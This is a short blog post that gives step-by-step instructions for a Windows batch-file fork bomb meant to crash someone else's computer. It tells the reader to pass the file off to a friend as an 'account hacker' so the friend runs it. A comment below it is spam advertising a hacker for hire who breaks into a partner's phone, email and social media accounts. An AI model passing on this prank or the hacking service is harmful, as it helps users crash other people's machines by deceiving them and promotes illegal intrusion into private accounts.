Tuesday, February 28, 2012

Crash Anyones Computer

This is intended as a joke and for educational use the purpose of this is not to remove everything from their desktop but to just crash their computer and scare them a little bit.
Ok. So open up notepad.

Type there:
Code:
start
start
start
start
start
start
start
start


hax.bat

Save the file as hax.bat

Also Try

Code:
@echo off
:main
start
goto main

Do not open on your own computer !!!
Say to your friend that this is account hacker or something.
And boom computer crashed.
If you dont think it works go ahead and open it urself...

1 comments:

jane holly said...

My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

Post a Comment

 
Design by Secure Hackers